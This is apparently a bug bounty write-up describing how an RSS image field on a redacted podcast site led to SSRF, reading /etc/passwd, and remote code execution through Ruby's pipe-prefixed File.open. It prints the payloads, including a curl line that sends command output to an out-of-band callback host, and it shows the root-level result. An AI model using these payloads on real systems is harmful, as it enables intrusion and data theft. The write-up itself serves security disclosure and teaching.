My name is Yazeed Alhourani (zerox4) :) ,

One Year since my first Writeup I don't like writing a lot I am little bit lazy, and today I liked to share with you an awesome vulnerability I have found on REDACTED website :)

when I start researching on website that helping people to share their podcasts , and share it in several platform … this is all not important , in that website I found an option that you can retrieve podcasts from RSS feed , all looks normal until now , but when I was intercepting the requests and checking the response I found something stopped me for like a 5 minutes .

None

As you see there is feed_url parameter that contain the RSS feed URL all normal , but show_image parameter in response have stopped me … , I was thinking does it convert the RSS feed to image with all XML tags ??? - NOOO of course NO :))

so I have download the RSS feed file and open it Text Editor then I found this XML Tag:

<itunes:image href="http://imagelink" />

I found this tag , I have opened the image link in browser and compare it to that base64 encoded JPG image and I found that it's the same image ,

I said coooooooooool!!! I tried to achieve SSRF and I have succeed but SSRF didn't led me to anything important I always seek for secrets and diving deeep! No AWS metadata or anything ====> that's all after I'd copied the same RSS feed and upload it on my own VPS and try it instead of original SSRF feed and changing "<itunes:image href="http://imagelink" />" image link , the server was retrieving the image data

and when I was trying to change the image link I have added ; semi colon by accident an interesting error appeared :))

No such file or directory @ rb_sysopen

Hmmmm

None

So I found that it's Ruby application I know that before :) ,

I don't have any knowledge about Ruby and didn't tried to coding with it before , but that doesn't stopped me , I have searched about this error and I have found that it's belongs to File.open() method in "RUBY" , I said Okay it's awesome let's try to read local files

I have changed the image link in that XML tag ^ "<itunes:image href="/etc/passwd" />"

and save the RSS file in my own VPS and send it to RSS validator and hit send in burp ….. Yaaaaay

it fetched the local file from the website server (/etc/passwd), that's cool .

and when I was searching about Ruby and this file system method I found that Ruby works weirdly and with magical ways , I found that if you add a single pipe , like this in File.open("/etc/passwd | <OS_COMMAN>") we can run OS commands ,

but how ???

in ruby if a path string starts with a pipe ( | ), Ruby thinks the rest of the string is an OS command, and it spawn new subprocess and we can run OS commands

Okay let's give it a try :) ,

<itunes:image href="| curl http://burpcollaboratorID.oastify.com/$(id)" />

hit send in Burp and pull in collaborator :)

we got request in collaborator :)))

GET /uid=0(root) HTTP/1.1
Host: burpcollaboratorID.oastify.com
User-Agent: curl/7.88.1
Accept: */*

Yaaaay

None

And that's all guys, that's how I have found RCE vulnerability via RSS validator

I hope you enjoyed it and all was clear and simple .

Thanks.